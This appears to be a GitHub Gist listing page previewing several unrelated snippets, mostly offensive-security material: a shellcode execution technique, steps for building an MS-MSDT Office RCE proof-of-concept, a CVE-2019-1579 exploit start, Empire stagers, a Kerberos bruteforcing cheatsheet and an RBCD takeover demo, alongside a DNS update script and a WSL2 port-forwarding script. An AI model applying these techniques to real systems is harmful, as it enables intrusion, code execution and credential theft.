Skip to content

Instantly share code, notes, and snippets.

@RistBS
RistBS / shellcode_exec_workerfactory.c
Last active July 30, 2024 16:31
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {
@tothi
tothi / ms-msdt.MD
Last active September 29, 2024 08:10
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@christr
christr / update-dns.sh
Last active January 10, 2025 01:23 — forked from mhussain/update-dns.sh
Linode dynamic DNS updating script
#!/bin/bash
# Modified by Chris Richardson (https://github.com/christr and https://twitter.com/christr77) on 09/20/2020
# Previous versions of this script don't work because they hadn't been updated since 2012. There are now more steps involved to set this up.
# This script update is based on information found here: https://developers.linode.com/api/v4/domains-domain-id-records-record-id/#put
# You first must find out the domain ID and resource ID numbers. In order to do this follow the steps below.
# 1. Create a Linode API Key through your account profile at https://cloud.linode.com/dashboard. Give it rights to read/write to domains only.
# 2. From a shell run the following command: LINODE_API_KEY=[insert API key from step 1 here]
# 3. Run the following command to get the domain ID number for the domain you want to manage: curl -H "Authorization: Bearer $LINODE_API_KEY" https://api.linode.com/v4/domains/
@rqu1
rqu1 / 8.0 hax
Last active August 4, 2022 12:22
CVE-2019-1579 fun times
#!/usr/bin/env python2
import urllib2
import struct
# Constants
ip_addr= '172.31.21.2'
# PA-VM
# 8.0
scep_offset=24
@whid-injector
whid-injector / whid.py
Created September 27, 2019 06:38
Linux/OSX stager for Empire 2.3. Place in lib/stagers/osx directory. P.S. It is old thingy I accidentally found on my VPS. Not sure still works.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'WHIDLauncher',
'Author': ['@LucaBongiorni','@xorrior'],
@whid-injector
whid-injector / whid.py
Created September 27, 2019 06:38
Windows stager for Empire 2.3. Place in lib/stagers/windows directory. P.S. It is old thingy I accidentally found on my VPS. Not sure still works.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'WHIDLauncher',
'Author': ['@LucaBongiorni','@harmj0y','@kisasondi'],
@xmeng1
xmeng1 / wsl2-network.ps1
Created July 14, 2019 06:50
WSL2 Port forwarding port to linux
$remoteport = bash.exe -c "ifconfig eth0 | grep 'inet '"
$found = $remoteport -match '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}';
if( $found ){
$remoteport = $matches[0];
} else{
echo "The Script Exited, the ip address of WSL 2 cannot be found";
exit;
}
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@HarmJ0y
HarmJ0y / rbcd_demo.ps1
Last active January 4, 2025 14:26
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_